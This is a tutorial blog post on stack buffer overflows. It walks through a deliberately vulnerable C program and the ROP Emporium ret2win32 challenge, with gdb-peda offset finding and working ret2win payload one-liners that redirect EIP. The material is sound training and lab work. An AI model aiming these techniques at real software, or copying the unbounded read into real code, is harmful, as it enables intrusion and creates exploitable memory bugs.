Getting Started #
A buffer overflow occurs when a program writes more data to a buffer (a contiguous block of memory) than it can hold, so that adjacent memory locations are overwritten. In this blog post, we will start with an introduction to stack-based buffer overflows and explore a technique called ret2win.
For example, this program cannot be overflowed, because it never reads more than the buffer can hold:
#include <stdio.h>
#include <unistd.h>
int secure(){
char buffer[200];
int input;
input = read(0, buffer, 200); //matches the buffer size
printf("\n[+] user supplies: %d-bytes!", input);
printf("\n[+] buffer content --> %s!", buffer);
return 0;
}
int main(int argc, char * argv[]){
secure();
return 0;
}
gcc -m32 secure.c -o notvulnerable
It doesn’t matter how many characters we pass in: only 200 bytes are read, because the third argument to read caps the input at 200 bytes, which matches the size of the buffer.
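To make the role of that size argument concrete, here is a minimal Python sketch of a toy memory region. It is not the real stack layout that gcc produces: the 4-byte `NEIGHBOUR` value and the `simulate_read` helper are made up for illustration, and a real frame has padding and saved registers between the buffer and anything interesting.

```python
BUF_SIZE = 200
NEIGHBOUR = b"SAFE"  # hypothetical 4 bytes that sit right after the buffer


def simulate_read(data: bytes, max_bytes: int) -> bytearray:
    """Copy at most max_bytes of data into a toy region laid out as
    [200-byte buffer][4 neighbouring bytes], like read(0, buffer, max_bytes)."""
    memory = bytearray(BUF_SIZE) + bytearray(NEIGHBOUR)
    # Truncate to the size of the toy region so the model stays a fixed size.
    chunk = data[:max_bytes][:len(memory)]
    memory[:len(chunk)] = chunk
    return memory


user_input = b"A" * 300
capped = simulate_read(user_input, 200)    # size argument matches the buffer
uncapped = simulate_read(user_input, 400)  # size argument larger than the buffer

print(bytes(capped[BUF_SIZE:]))    # b'SAFE'  (neighbour untouched)
print(bytes(uncapped[BUF_SIZE:]))  # b'AAAA'  (neighbour overwritten by input)
```

The only difference between the two calls is the size argument, which is also the only difference that matters in the C code.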
Now this is an example program susceptible to buffer overflow:
#include <stdio.h>
#include <unistd.h>
int overflow(){
char buffer[200];
int input;
input = read(0, buffer, 400); //doesn't match the buffer size
printf("\n[+] user supplies: %d-bytes!", input);
printf("\n[+] buffer content --> %s!", buffer);
return 0;
}
int main(int argc, char * argv[]){
overflow();
return 0;
}
Let’s compile it as a 32-bit binary for simplicity, and without stack protection or PIE for demonstration purposes:
gcc -m32 -fno-stack-protector -no-pie -o vulnerable Overflow.c
Here’s what each flag does:
- -m32: Compile the code for a 32-bit architecture.
- -fno-stack-protector: Disable stack protection mechanisms that help prevent buffer overflows.
- -no-pie: Compile the code without Position Independent Executable (PIE) support, meaning the code’s memory addresses will be fixed.
Next we will inspect the binary in gdb. To see the function names easily, the binary should not be stripped. Stripping removes the symbol table, which includes function and variable names. This is usually done for production binaries, while developers keep an unstripped copy for debugging. To check the file’s properties:
file vulnerable
Understanding the Basics #
We will use gdb-peda, so install it before continuing.
Let’s start gdb with our vulnerable binary and list the functions:
gdb -q ./vulnerable
info functions
We can see all the functions in the binary.
Let’s try disassembling main function as an example:
disas main
Let’s break down what we see: there are the memory addresses and, of course, the registers and instructions.
Registers are small storage locations in the CPU that hold data, addresses, or control information for quick access during execution. Instructions are commands that the CPU executes, specifying operations to perform on data stored in registers or memory. Don’t confuse instructions with registers. Here are a few examples:
- Registers
  - EIP: Points to the next instruction.
  - ESP: Points to the top of the stack.
  - EBP: Points to the base of the current stack frame.
- Instructions
  - ret: Returns control to the calling function.
  - call: Calls a function, saving the return address.
  - jmp: Unconditionally jumps to a specified address.
EIP, the instruction pointer, holds the address of the instruction that is about to be executed.
When we perform a BOF, the return address is overwritten, which means the function can no longer return to its caller to finish what it started. Instead, when the function attempts to return (using the ret instruction), it jumps to the new address rather than the intended one.
The call instruction places the return address at the top of the stack.
The return address is placed on the stack when a function is called, waiting to be used for restoring the execution flow. When the function completes and executes the ret instruction, it takes the value from the top of the stack (pointed to by the ESP register) and loads it into the EIP register. This action restores the execution flow to the original program, allowing it to resume from where the function was called. Thus, the function successfully exits and control returns to the calling code.
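The call/ret mechanism described above can be sketched as a toy model in Python. This is only an illustration under simplifying assumptions: the `ToyCPU` class and both addresses are made up, and a real x86 stack is a region of memory that grows downward rather than a Python list.

```python
class ToyCPU:
    """A toy model of EIP and the stack, just enough to show call and ret."""

    def __init__(self):
        self.eip = 0
        self.stack = []  # the end of the list plays the role of the top of the stack (ESP)

    def call(self, target, return_address):
        # call: save the return address on the stack, then jump to the target.
        self.stack.append(return_address)
        self.eip = target

    def ret(self):
        # ret: pop whatever is on top of the stack into EIP.
        self.eip = self.stack.pop()


cpu = ToyCPU()

# Normal flow: ret brings us back to the saved return address.
cpu.call(target=0x08049196, return_address=0x080491F0)  # made-up addresses
cpu.ret()
normal = cpu.eip

# Overflow: the saved return address is overwritten before ret runs.
cpu.call(target=0x08049196, return_address=0x080491F0)
cpu.stack[-1] = 0x42424242  # what a buffer overflow does to the saved value
cpu.ret()
hijacked = cpu.eip

print(hex(normal), hex(hijacked))  # 0x80491f0 0x42424242
```

Note that ret never checks where the value came from. It loads whatever sits on top of the stack, which is why controlling that value means controlling EIP.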
It’s alright if you didn’t understand all that, once we get going you will slowly get all this into your brain.
Exploiting #
This is the general outline we will follow (assuming that there are no defence mechanisms in place):
- Segfault/Crash: Crash or overflow the program
- Eip-offset: Find out how many bytes it takes to crash the program and reach EIP
- Eip-overwrite: Confirm the offset with the legendary “B test”
- Shellcode/ret2-based attacks: Use shellcode if NX/DEP is absent, or ret2* if it is present
- Pwned: <insert happy hacker noises>
Now that I’ve explained the basics, think about what would happen if we overflow the buffer just enough to reach the saved return address and put our own address there. That’s right! When the function returns, EIP gets our address and the program executes whatever we point it at.
Now let’s go through the steps.
Crashing #
Now let’s try to crash the program. Let’s use an obscenely large number of characters:
python -c 'print("A"*500)' | ./vulnerable
Yup it crashed. Onto the next step!
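Before moving on, here is a hedged sketch of how the crash check could be scripted in Python instead of watching the terminal. The helper name `crashes_with_segfault` is made up for this post. To keep the snippet runnable anywhere, the demo target is a child Python process that sends itself SIGSEGV; for the real thing you would pass `["./vulnerable"]` as the command. It assumes a POSIX system.

```python
import signal
import subprocess
import sys


def crashes_with_segfault(command, payload: bytes) -> bool:
    """Run command, feed payload on stdin, and report whether it died from SIGSEGV."""
    result = subprocess.run(
        command,
        input=payload,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    # On POSIX, a return code of -N means the child was killed by signal N.
    return result.returncode == -signal.SIGSEGV


# Stand-in for a crashing binary: a child process that sends itself SIGSEGV.
demo_target = [
    sys.executable,
    "-c",
    "import os, signal; os.kill(os.getpid(), signal.SIGSEGV)",
]

print(crashes_with_segfault(demo_target, b"A" * 500))
```

The same helper can be called in a loop with growing payloads, which is the "increase until it crashes" approach mentioned in the next section.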
Eip-offset #
How many bytes does it take to crash it? There are two techniques to find out:
- Increase the number of bytes until it crashes
- A better approach is to create a pattern and find out which part of the pattern ends up in EIP to get the offset
To detect the overflow into EIP we will use cyclic patterns. We can use the built-in pattern command in gdb-peda:
pattern create 600
Now for our vulnerable program we know we need 400 bytes (only because we have the source code):
pattern create 400 pattern.txt
Now let’s pass the pattern into the program. We set a catchpoint so that gdb stops on a segmentation fault:
gdb ./vulnerable
catch signal SIGSEGV
r < pattern.txt
gdb shows the value that ended up in EIP, so now we can look up its offset in the pattern:
pattern offset 0x4325416e
The offset is 216 bytes.
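To show why a cyclic pattern gives the offset directly, here is a simplified Python sketch of the idea. It is not PEDA's implementation: `pattern_create` and `pattern_offset` below are stand-ins that use a simple "Aa0Aa1Aa2..." layout, so the EIP values PEDA reports will not be found in this pattern. The principle is the same: every 4-byte window is unique, so the 4 bytes found in EIP identify one position.

```python
import string
import struct


def pattern_create(length: int) -> bytes:
    """Build an 'Aa0Aa1Aa2...' pattern in which every 4-byte window is unique."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length too large for this simple pattern")


def pattern_offset(eip_value: int, length: int) -> int:
    """Return the position of the 4 bytes that ended up in EIP, or -1 if absent."""
    # EIP is read from memory as a little-endian integer, so pack it back
    # into the byte order it had inside the input.
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


pattern = pattern_create(400)
# Pretend the 4 bytes at position 216 landed in EIP.
fake_eip = struct.unpack("<I", pattern[216:220])[0]
print(pattern_offset(fake_eip, 400))  # 216
```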
Eip-overwrite #
We need to check that we can write into EIP. Now that we know the offset is 216, let’s pass in 216 A’s followed by 4 B’s (4 because an address is 4 bytes, i.e. 32 bits):
python -c 'print("A"*216 + "BBBB")' > EIP_offset.txt
If the offset is right, EIP will hold 0x42424242, which is the hex for BBBB:
gdb -q ./vulnerable
catch signal SIGSEGV
r < EIP_offset.txt
We can see that BBBB is in EIP:
Shellcode/ret2*-based attacks #
To check security measures:
pwn checksec ./vulnerable
We can’t use a shellcode attack here because the NX bit makes the stack non-executable. Instead we will use a ret2-based attack, which needs a function inside the binary that we can jump to. So let’s add one (you obviously can’t do this with binaries for which you don’t have the source code, so there you would use a function that already exists).
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int hackme()
{
system("touch hacked.txt && ls -la"); // create a marker file, then list the directory
return 0;
}
int overflow(){
char buffer[200];
int input;
input = read(0, buffer, 400); //doesn't match the buffer size
printf("\n[+] user supplies: %d-bytes!", input);
printf("\n[+] buffer content --> %s!", buffer);
return 0;
}
int main(int argc, char * argv[]){
overflow();
return 0;
}
In this program, the hackme function is never called, so under normal circumstances its code never runs. However, by exploiting the BOF in the binary, we can “hack” it and force the execution of the hackme function. This demonstrates how we can manipulate the program’s control flow to run code that is otherwise unreachable.
Now we can find the address for the hackme function:
gdb -q ./vulnerable
info functions
We have the address of the hackme function. We can also get it by using:
p hackme
Disassembling hackme function:
disas hackme
There is a call to system, and just above it a push. When you see an address being pushed right before a function call, the address is likely an argument for the function (system() in this case).
The address 0x8049060 points to the Procedure Linkage Table (PLT) entry for the system function here.
Examining the address being pushed:
- Big Endian: evil_function = 0xdeadbeef is stored in memory as the bytes de ad be ef
- Little Endian: evil_function = 0xdeadbeef is stored in memory as the bytes ef be ad de
x86 is a little-endian architecture, so we need to write addresses into the payload in reverse byte order, least significant byte first.
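Reversing bytes by hand is easy to get wrong, so here is a small sketch using Python's standard `struct` module to do the conversion. The address is the 0xdeadbeef example from above, not a real address in the binary.

```python
import struct

address = 0xDEADBEEF

# "<I" means little-endian unsigned 32-bit integer; ">I" is the big-endian form.
little = struct.pack("<I", address)
big = struct.pack(">I", address)

print(little.hex())  # efbeadde
print(big.hex())     # deadbeef

# Unpacking with the same format recovers the original address.
recovered = struct.unpack("<I", little)[0]
print(hex(recovered))  # 0xdeadbeef
```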
Pwned #
We need a payload of the form payload = offset + hackme_addr:
- offset: 216 bytes, as we discovered
- hackme_addr: 0x08049186, which becomes the bytes 86 91 04 08 in little-endian
Let’s use Python to generate the payload. Python 2 is slightly easier because its strings are plain bytes, so \x escapes are printed as-is. In Python 3 we write a bytes object to sys.stdout.buffer instead:
python2 -c 'print("A" * 216 + "\x86\x91\x04\x08")' | ./vulnerable
python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 216 + b"\x86\x91\x04\x08")' | ./vulnerable
We have executed the hackme() function. Remember, it was never called from main. We have successfully hacked the program.
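The one-liners above can also be written as a small reusable script. This is a minimal sketch: `build_payload` is a made-up helper name, and the offset and address are the ones found earlier in this post, so they will differ for a binary you compile yourself.

```python
import struct


def build_payload(offset: int, target_address: int, filler: bytes = b"A") -> bytes:
    """Return offset filler bytes followed by the target address in little-endian."""
    return filler * offset + struct.pack("<I", target_address)


payload = build_payload(216, 0x08049186)  # offset and hackme address from this post
print(len(payload), payload[-4:].hex())   # 220 86910408
```

To feed it to the binary, write the bytes with `sys.stdout.buffer.write(payload)` and pipe the script into `./vulnerable`, exactly as the Python 3 one-liner does.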
Capstone Exercise #
We will solve a challenge from https://ropemporium.com/ called ret2win. We will solve the x86 version, but the x86_64 version is solved similarly. We don’t have the source code in this case.
Unzip it and you’ll have the ret2win32 binary. Let’s check the security measures:
pwn checksec ./ret2win32
We have NX enabled so we can’t use shellcode.
To print the sequences of printable characters in the binary:
strings ret2win32
Or use this for a better output:
rabin2 -z ret2win32
rabin2 is part of radare2.
Okayyyyyyy let’s execute it:
./ret2win32
Now let’s try to overflow it:
python3 -c 'print("A"*100)' | ./ret2win32
Let’s check dmesg. We could also use GDB but this is quicker.
sudo dmesg
The log shows 41414141. To see which character 0x41 is:
printf '\x41' | xxd
It is A, so the crash came from our input and we can overflow the binary.
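Values copied from dmesg or gdb can also be decoded in Python, which helps when the bytes are not all the same letter. This is a small sketch with a made-up helper name, `register_to_ascii`. It assumes a 32-bit little-endian register value, as on x86.

```python
def register_to_ascii(value: int) -> str:
    """Show a 32-bit register value as the 4 input characters that produced it."""
    raw = value.to_bytes(4, "little")  # byte order the value had in memory
    return raw.decode("ascii", errors="replace")


print(register_to_ascii(0x41414141))  # AAAA
print(register_to_ascii(0x42424242))  # BBBB
print(register_to_ascii(0x41414641))  # AFAA
```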
Let’s add catch signal SIGSEGV to our config at ~/.gdbinit, as it gets annoying typing it every time:
set debuginfod enabled on
source ~/.peda/peda.py
catch signal SIGSEGV
Start gdb and let’s find the offset.
gdb -q ./ret2win32
pattern create 100 pattern.txt
r < pattern.txt
Now finding the offset:
pattern offset 0x41414641
So 44 is the offset.
Let’s check with the “B test”:
python3 -c 'print("A"*44 + "BBBB")' | ./ret2win32
Now check logs:
sudo dmesg
0x42424242 is BBBB, so it worked.
Now we can use the ret2 method, as we cannot use shellcode with NX enabled.
We need a function to return to. The binary has a pwnme function.
Disassembling it:
disas pwnme
We see a lot of calls to puts, so this is probably the function that printed what we saw earlier when the program ran. This is confirmed by examining the addresses being pushed:
Let’s try disassembling the ret2win function:
disas ret2win
Let’s examine the address pushed just above the call to system:
x/s 0x8048813
Converting the address of ret2win (0x0804862c) to little-endian and passing it in after the offset:
python2 -c 'print("A"*44 + "\x2c\x86\x04\x08")' | ./ret2win32
And there we have it, we have successfully hacked it.
Stay tuned for more content on Reverse Engineering, thank you for reading!